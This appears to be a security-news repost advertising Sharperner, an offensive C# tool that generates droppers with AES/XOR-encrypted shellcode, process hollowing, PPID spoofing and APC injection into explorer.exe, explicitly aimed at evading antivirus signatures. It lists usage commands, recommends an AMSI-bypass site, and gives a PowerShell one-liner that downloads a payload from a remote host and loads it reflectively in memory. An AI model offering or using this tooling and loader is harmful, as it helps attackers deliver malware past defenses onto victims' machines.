Sharperner – Simple Executable Generator With Encrypted Shellcode

Sharperner is a tool written in CSharp that generate .NET dropper with AES and XOR obfuscated shellcode. Generated executable can possibly bypass signature check but I cant be sure it can bypass heuristic scanning.
Features
PE binary
- Process Hollowing
- PPID Spoofing
- Random generated AES key and iv
- Final Shellcode, Key and IV are translated to morse code 🙂
.NET binary
- AES + XOR encrypted shellcode
- APC Process Injection (explorer.exe)
- Random function names
- Random generated AES key and iv
- Final Shellcode, Key and IV are translated to morse code 🙂
Usage
/file       B64,hex,raw shellcode
/type       cs,cpp
/out        Output file Location (Optional)
Example:
Sharperner.exe /file:file.txt /type:cpp
Sharperner.exe /file:file.txt /out:payload.exe
Suggestion
To avoid touching the disk, Generated .NET executable can be loaded reflectively with powershell. AMSI is the enemy now, amsi.fail ftw!
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/payload.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[TotallyNotMal.Program]::Main()Download Sharperner
If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.


 
                       
                      ![Cobalt Strike Beacon Detected - 119[.]45[.]29[.]172:8089 6 Cobalt-Strike](https://www.redpacketsecurity.com/wp-content/uploads/2021/11/Cobalt-Strike-300x201.jpg) 
                       
